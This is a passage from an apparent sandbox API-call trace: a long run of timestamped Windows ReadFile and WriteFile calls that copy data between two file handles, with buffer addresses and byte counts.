lpOverlapped=0x0) returned 1 [0021.857] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.858] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.858] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.859] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.860] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.861] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.862] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.863] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.863] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.863] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x316, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.864] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.865] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.865] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.866] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.866] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.867] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.867] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.868] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.868] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.869] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.869] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.870] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.870] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.872] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.872] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.873] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.873] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.875] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.875] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.876] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.877] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.877] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.877] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.878] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x163, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.878] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.879] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.879] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.880] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x379, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.880] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.881] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.881] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.882] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.882] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.883] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.884] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x355, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.884] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.886] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.886] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.887] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.887] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.888] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.889] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.890] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.890] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.890] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.891] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.891] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.892] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.892] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.893] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.893] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.894] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x227, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.894] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.895] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.895] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.896] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.897] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.898] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.900] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.901] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.901] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.902] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x133, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.904] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, 